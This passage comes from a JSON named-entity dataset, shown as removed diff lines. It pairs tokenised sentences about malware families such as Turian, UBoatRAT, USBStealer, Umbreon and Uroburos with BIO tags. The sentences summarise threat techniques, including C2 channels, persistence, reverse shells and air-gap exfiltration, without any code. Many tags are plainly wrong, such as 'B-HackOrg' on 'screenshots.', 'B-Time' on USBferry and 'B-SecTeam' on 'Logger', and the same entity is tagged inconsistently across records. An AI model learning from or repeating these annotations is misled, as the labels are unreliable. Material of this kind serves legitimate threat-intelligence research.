], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Trojan.Karagany", - "can", - "inject", - "a", - "suspended", - "thread", - "of", - "its", - "own", - "process", - "into", - "a", - "new", - "process", - "and", - "initiate", - "via", - "the", - "<code>ResumeThread</code>", - "API." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "Trojan.Karagany", - "can", - "communicate", - "with", - "C2", - "via", - "HTTP", - "POST", - "requests." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Trojan.Karagany", - "can", - "perform", - "reconnaissance", - "commands", - "on", - "a", - "victim", - "machine", - "via", - "a", - "cmd.exe", - "process." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "Trojan.Mebromi", - "performs", - "BIOS", - "modification", - "and", - "can", - "download", - "and", - "execute", - "a", - "file", - "as", - "well", - "as", - "protect", - "itself", - "from", - "removal." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "B-Features", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "To", - "establish", - "persistence,", - "Truvasys", - "adds", - "a", - "Registry", - "Run", - "key", - "with", - "a", - "value", - "\"TaskMgr\"", - "in", - "an", - "attempt", - "to", - "masquerade", - "as", - "the", - "legitimate", - "Windows", - "Task", - "Manager." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Truvasys", - "adds", - "a", - "Registry", - "Run", - "key", - "to", - "establish", - "persistence." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Turian", - "can", - "use", - "WinRAR", - "to", - "create", - "a", - "password-protected", - "archive", - "for", - "files", - "of", - "interest." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Turian", - "has", - "the", - "ability", - "to", - "use", - "a", - "XOR", - "decryption", - "key", - "to", - "extract", - "C2", - "server", - "domains", - "and", - "IP", - "addresses." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Turian", - "can", - "search", - "for", - "specific", - "files", - "and", - "list", - "directories." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Turian", - "can", - "download", - "additional", - "files", - "and", - "tools", - "from", - "its", - "C2." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Turian", - "can", - "insert", - "pseudo-random", - "characters", - "into", - "its", - "network", - "encryption", - "setup." - ], - "ner_tags": [ - "B-Idus", - "O", - "I-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Turian", - "can", - "store", - "copied", - "files", - "in", - "a", - "specific", - "directory", - "prior", - "to", - "exfiltration." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Turian", - "can", - "disguise", - "as", - "a", - "legitimate", - "service", - "to", - "blend", - "into", - "normal", - "operations." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Turian", - "can", - "use", - "VMProtect", - "for", - "obfuscation." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "Turian", - "can", - "scan", - "for", - "removable", - "media", - "to", - "collect", - "data." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Turian", - "has", - "the", - "ability", - "to", - "use", - "Python", - "to", - "spawn", - "a", - "Unix", - "shell." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Turian", - "can", - "establish", - "persistence", - "by", - "adding", - "Registry", - "Run", - "keys." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Turian", - "has", - "the", - "ability", - "to", - "take", - "screenshots." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "I-Features", - "B-HackOrg" - ] - }, - { - "tokens": [ - "Turian", - "can", - "retrieve", - "system", - "information", - "including", - "OS", - "version,", - "memory", - "usage,", - "local", - "hostname,", - "and", - "system", - "adapter", - "information." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Turian", - "can", - "retrieve", - "the", - "internal", - "IP", - "address", - "of", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Turian", - "can", - "retrieve", - "usernames." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Turian", - "has", - "the", - "ability", - "to", - "use", - "<code>/bin/sh</code>", - "to", - "execute", - "commands." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Turian", - "has", - "the", - "ability", - "to", - "use", - "HTTP", - "for", - "its", - "C2." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Turian", - "can", - "create", - "a", - "remote", - "shell", - "and", - "execute", - "commands", - "using", - "cmd." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "UACMe", - "contains", - "many", - "methods", - "for", - "bypassing", - "Windows", - "User", - "Account", - "Control", - "on", - "multiple", - "versions", - "of", - "the", - "operating", - "system." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "UBoatRAT", - "takes", - "advantage", - "of", - "the", - "/SetNotifyCmdLine", - "option", - "in", - "BITSAdmin", - "to", - "ensure", - "it", - "stays", - "running", - "on", - "a", - "system", - "to", - "maintain", - "persistence." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "UBoatRAT", - "has", - "used", - "GitHub", - "and", - "a", - "public", - "blog", - "service", - "in", - "Hong", - "Kong", - "for", - "C2", - "communications." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Area", - "B-Area", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "UBoatRAT", - "can", - "upload", - "and", - "download", - "files", - "to", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "UBoatRAT", - "can", - "list", - "running", - "processes", - "on", - "the", - "system." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "UBoatRAT", - "encrypts", - "instructions", - "in", - "its", - "C2", - "network", - "payloads", - "using", - "a", - "simple", - "XOR", - "cipher." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "O", - "O" - ] - }, - { - "tokens": [ - "UBoatRAT", - "checks", - "for", - "virtualization", - "software", - "such", - "as", - "VMWare,", - "VirtualBox,", - "or", - "QEmu", - "on", - "the", - "compromised", - "machine." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "UBoatRAT", - "has", - "used", - "HTTP", - "for", - "C2", - "communications." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "UBoatRAT", - "can", - "start", - "a", - "command", - "shell." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "UPPERCUT", - "has", - "the", - "capability", - "to", - "gather", - "the", - "victim's", - "current", - "directory." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "B-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "UPPERCUT", - "can", - "download", - "and", - "upload", - "files", - "to", - "and", - "from", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "UPPERCUT", - "can", - "capture", - "desktop", - "screenshots", - "in", - "the", - "PNG", - "format", - "and", - "send", - "them", - "to", - "the", - "C2", - "server." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Some", - "versions", - "of", - "UPPERCUT", - "have", - "used", - "the", - "hard-coded", - "string", - "“this", - "is", - "the", - "encrypt", - "key”", - "for", - "Blowfish", - "encryption", - "when", - "communicating", - "with", - "a", - "C2.", - "Later", - "versions", - "have", - "hard-coded", - "keys", - "uniquely", - "for", - "each", - "C2", - "address." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "UPPERCUT", - "has", - "the", - "capability", - "to", - "gather", - "the", - "system’s", - "hostname", - "and", - "OS", - "version." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "UPPERCUT", - "has", - "the", - "capability", - "to", - "gather", - "the", - "victim's", - "proxy", - "information." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "B-HackOrg", - "O", - "O" - ] - }, - { - "tokens": [ - "UPPERCUT", - "has", - "the", - "capability", - "to", - "collect", - "the", - "current", - "logged", - "on", - "user’s", - "username", - "from", - "a", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "UPPERCUT", - "has", - "the", - "capability", - "to", - "obtain", - "the", - "time", - "zone", - "information", - "and", - "current", - "timestamp", - "of", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "UPPERCUT", - "has", - "used", - "HTTP", - "for", - "C2,", - "including", - "sending", - "error", - "codes", - "in", - "Cookie", - "headers." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "UPPERCUT", - "uses", - "cmd.exe", - "to", - "execute", - "commands", - "on", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "For", - "all", - "non-removable", - "drives", - "on", - "a", - "victim,", - "USBStealer", - "executes", - "automated", - "collection", - "of", - "certain", - "files", - "for", - "later", - "exfiltration." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "USBStealer", - "automatically", - "exfiltrates", - "collected", - "files", - "via", - "removable", - "media", - "when", - "an", - "infected", - "device", - "connects", - "to", - "an", - "air-gapped", - "victim", - "machine", - "after", - "initially", - "being", - "connected", - "to", - "an", - "internet-enabled", - "victim", - "machine." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "USBStealer", - "drops", - "commands", - "for", - "a", - "second", - "victim", - "onto", - "a", - "removable", - "media", - "drive", - "inserted", - "into", - "the", - "first", - "victim,", - "and", - "commands", - "are", - "executed", - "when", - "the", - "drive", - "is", - "inserted", - "into", - "the", - "second", - "victim." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Once", - "a", - "removable", - "media", - "device", - "is", - "inserted", - "back", - "into", - "the", - "first", - "victim,", - "USBStealer", - "collects", - "data", - "from", - "it", - "that", - "was", - "exfiltrated", - "from", - "a", - "second", - "victim." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Most", - "strings", - "in", - "USBStealer", - "are", - "encrypted", - "using", - "3DES", - "and", - "XOR", - "and", - "reversed." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "USBStealer", - "exfiltrates", - "collected", - "files", - "via", - "removable", - "media", - "from", - "air-gapped", - "victims." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "USBStealer", - "has", - "several", - "commands", - "to", - "delete", - "files", - "associated", - "with", - "the", - "malware", - "from", - "the", - "victim." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "USBStealer", - "searches", - "victim", - "drives", - "for", - "files", - "matching", - "certain", - "extensions", - "(“.skr”,“.pkr”", - "or", - "“.key”)", - "or", - "names." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "USBStealer", - "collects", - "files", - "matching", - "certain", - "criteria", - "from", - "the", - "victim", - "and", - "stores", - "them", - "in", - "a", - "local", - "directory", - "for", - "later", - "exfiltration." - ], - "ner_tags": [ - "B-Way", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "USBStealer", - "mimics", - "a", - "legitimate", - "Russian", - "program", - "called", - "USB", - "Disk", - "Security." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "B-Area", - "O", - "O", - "I-Tool", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "USBStealer", - "monitors", - "victims", - "for", - "insertion", - "of", - "removable", - "drives.", - "When", - "dropped", - "onto", - "a", - "second", - "victim,", - "it", - "also", - "enumerates", - "drives", - "connected", - "to", - "the", - "system." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "USBStealer", - "registers", - "itself", - "under", - "a", - "Registry", - "Run", - "key", - "with", - "the", - "name", - "\"USB", - "Disk", - "Security.\"" - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "USBStealer", - "drops", - "itself", - "onto", - "removable", - "media", - "and", - "relies", - "on", - "Autorun", - "to", - "execute", - "the", - "malicious", - "file", - "when", - "a", - "user", - "opens", - "the", - "removable", - "media", - "on", - "another", - "system." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "USBStealer", - "sets", - "the", - "timestamps", - "of", - "its", - "dropper", - "files", - "to", - "the", - "last-access", - "and", - "last-write", - "timestamps", - "of", - "a", - "standard", - "Windows", - "library", - "chosen", - "on", - "the", - "system." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "USBferry", - "can", - "collect", - "information", - "from", - "an", - "air-gapped", - "host", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "USBferry", - "can", - "detect", - "the", - "victim's", - "file", - "or", - "folder", - "list." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "USBferry", - "can", - "use", - "<code>net", - "user</code>", - "to", - "gather", - "information", - "about", - "local", - "accounts." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "USBferry", - "can", - "check", - "for", - "connected", - "USB", - "devices." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "USBferry", - "can", - "use", - "<code>tasklist</code>", - "to", - "gather", - "information", - "about", - "the", - "process", - "running", - "on", - "the", - "infected", - "system." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-Purp", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "USBferry", - "can", - "use", - "<code>net", - "view</code>", - "to", - "gather", - "information", - "about", - "remote", - "systems." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "USBferry", - "can", - "copy", - "its", - "installer", - "to", - "attached", - "USB", - "storage", - "devices." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "USBferry", - "can", - "execute", - "rundll32.exe", - "in", - "memory", - "to", - "avoid", - "detection." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "USBferry", - "can", - "detect", - "the", - "infected", - "machine's", - "network", - "topology", - "using", - "<code>ipconfig</code>", - "and", - "<code>arp</code>." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "USBferry", - "can", - "use", - "<code>netstat</code>", - "and", - "<code>nbtstat</code>", - "to", - "detect", - "active", - "network", - "connections." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "B-Purp", - "O", - "O" - ] - }, - { - "tokens": [ - "USBferry", - "can", - "execute", - "various", - "Windows", - "commands." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Umbreon", - "creates", - "valid", - "local", - "users", - "to", - "provide", - "access", - "to", - "the", - "system." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "I-Purp", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "Umbreon", - "provides", - "access", - "to", - "the", - "system", - "via", - "SSH", - "or", - "any", - "other", - "protocol", - "that", - "uses", - "PAM", - "to", - "authenticate." - ], - "ner_tags": [ - "B-Idus", - "I-Purp", - "I-Purp", - "I-Purp", - "I-Purp", - "I-Purp", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "Umbreon", - "hides", - "from", - "defenders", - "by", - "hooking", - "libc", - "function", - "calls,", - "hiding", - "artifacts", - "that", - "would", - "reveal", - "its", - "presence,", - "such", - "as", - "the", - "user", - "account", - "it", - "creates", - "to", - "provide", - "access", - "and", - "undermining", - "strace,", - "a", - "tool", - "often", - "used", - "to", - "identify", - "malware." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "B-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Umbreon", - "provides", - "additional", - "access", - "using", - "its", - "backdoor", - "Espeon,", - "providing", - "a", - "reverse", - "shell", - "upon", - "receipt", - "of", - "a", - "special", - "packet." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Umbreon", - "provides", - "access", - "using", - "both", - "standard", - "facilities", - "like", - "SSH", - "and", - "additional", - "access", - "using", - "its", - "backdoor", - "Espeon,", - "providing", - "a", - "reverse", - "shell", - "upon", - "receipt", - "of", - "a", - "special", - "packet" - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Unknown", - "Logger", - "is", - "capable", - "of", - "stealing", - "usernames", - "and", - "passwords", - "from", - "browsers", - "on", - "the", - "victim", - "machine." - ], - "ner_tags": [ - "I-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Unknown", - "Logger", - "has", - "functionality", - "to", - "disable", - "security", - "tools,", - "including", - "Kaspersky,", - "BitDefender,", - "and", - "MalwareBytes." - ], - "ner_tags": [ - "I-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Unknown", - "Logger", - "is", - "capable", - "of", - "downloading", - "remote", - "files." - ], - "ner_tags": [ - "I-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "B-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "Unknown", - "Logger", - "is", - "capable", - "of", - "recording", - "keystrokes." - ], - "ner_tags": [ - "I-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "B-HackOrg" - ] - }, - { - "tokens": [ - "Unknown", - "Logger", - "is", - "capable", - "of", - "spreading", - "to", - "USB", - "devices." - ], - "ner_tags": [ - "I-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Unknown", - "Logger", - "can", - "obtain", - "information", - "about", - "the", - "victim", - "computer", - "name,", - "physical", - "memory,", - "country,", - "and", - "date." - ], - "ner_tags": [ - "I-SamFile", - "B-SecTeam", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Unknown", - "Logger", - "can", - "obtain", - "information", - "about", - "the", - "victim's", - "IP", - "address." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Unknown", - "Logger", - "can", - "obtain", - "information", - "about", - "the", - "victim", - "usernames." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Uroburos", - "has", - "used", - "a", - "combination", - "of", - "a", - "Diffie-Hellman", - "key", - "exchange", - "mixed", - "with", - "a", - "pre-shared", - "key", - "(PSK)", - "to", - "encrypt", - "its", - "top", - "layer", - "of", - "C2", - "communications." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Uroburos", - "has", - "encoded", - "outbound", - "C2", - "communications", - "in", - "DNS", - "requests", - "consisting", - "of", - "character", - "strings", - "made", - "to", - "resemble", - "standard", - "domain", - "names.", - "The", - "actual", - "information", - "transmitted", - "by", - "Uroburos", - "is", - "contained", - "in", - "the", - "part", - "of", - "the", - "character", - "string", - "prior", - "to", - "the", - "first", - "‘.’", - "character." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Uroburos", - "can", - "use", - "its", - "`Get`", - "command", - "to", - "exfiltrate", - "specified", - "files", - "from", - "the", - "compromised", - "system." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Uroburos", - "can", - "decrypt", - "command", - "parameters", - "sent", - "through", - "C2", - "and", - "use", - "unpacking", - "code", - "to", - "extract", - "its", - "packed", - "executable." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Uroburos", - "can", - "use", - "DLL", - "injection", - "to", - "load", - "embedded", - "files", - "and", - "modules." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "Uroburos", - "Queue", - "file", - "contains", - "embedded", - "executable", - "files", - "along", - "with", - "key", - "material,", - "communication", - "channels,", - "and", - "modes", - "of", - "operation." - ], - "ner_tags": [ - "O", - "B-SamFile", - "B-SecTeam", - "B-SamFile", - "O", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Uroburos", - "can", - "use", - "AES", - "and", - "CAST-128", - "encryption", - "to", - "obfuscate", - "resources." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Uroburos", - "can", - "use", - "up", - "to", - "10", - "channels", - "to", - "communicate", - "between", - "implants." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Uroburos", - "can", - "run", - "a", - "`Clear", - "Agents", - "Track`", - "command", - "on", - "an", - "infected", - "machine", - "to", - "delete", - "Uroburos-related", - "logs." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - 